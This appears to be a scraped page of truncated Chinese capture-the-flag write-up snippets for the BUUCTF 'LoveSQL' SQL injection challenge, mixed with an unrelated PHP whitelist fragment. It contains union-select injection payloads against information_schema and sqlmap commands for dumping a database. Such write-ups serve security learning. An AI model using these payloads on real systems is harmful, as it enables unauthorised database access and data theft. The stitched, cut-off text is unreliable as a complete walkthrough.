[极客大挑战 2019]LoveSQL 首先打开一个登录界面,用sqlmap是没有灵魂的 测试下是否有注入 查看字段:4报错,说明3个字段 先查询数据库 username=admin&password=1%27+union+select+1%2C2%2Cgroup_concat%28schema_name%29+from+information_schema.schemata%23 有这些数据库,当前数据库为geek 查表: username=admin&...
14|0[极客大挑战 2019]LoveSQL进去,看到上面提示说,用sqlmap,那就用。 burp抓包,保存为txt丢到kali里面 用sqlmap,payload如下sqlmap -r /root/桌面/1.txt -dbs sqlmap -r /root/桌面/1.txt -D geek --tables sqlmap -r /root/桌面/1.txt -D geek -T lovelysql --schema sqlmap -r /root/桌面/1...
public static function checkFile(&$page){ $whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) { echo "you can't see it";return false;} if (in_array($page, $whitelist)) { return true;} $_page = mb_substr($page,0,mb_...
12[极客大挑战 2019]LoveSQL 通用语句: 利用union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数payload是插入到原来的语句当中,构成了两个sql的语句,当第一个sql语句正确返回时,便不会显示第二个sql语句的结果。 ?id=-1 union select 1,2,3 --+ 利用函数database(),user(),version()可...
CTP平台:buuoj.cn/challenges 题目:Web类,[极客大挑战 2019]LoveSQL 打开题目的实例 看到熟悉界面与提示,尝试忽略灵魂元素,进行攻击 使用万能密码 接收到SQLmap工具的提示,用于SQL注入攻击,需要Python2环境,下载并测试 执行测试未成功,恢复攻击策略 采用爆破法尝试获得数据库字段 输入#符号,地址栏使 ...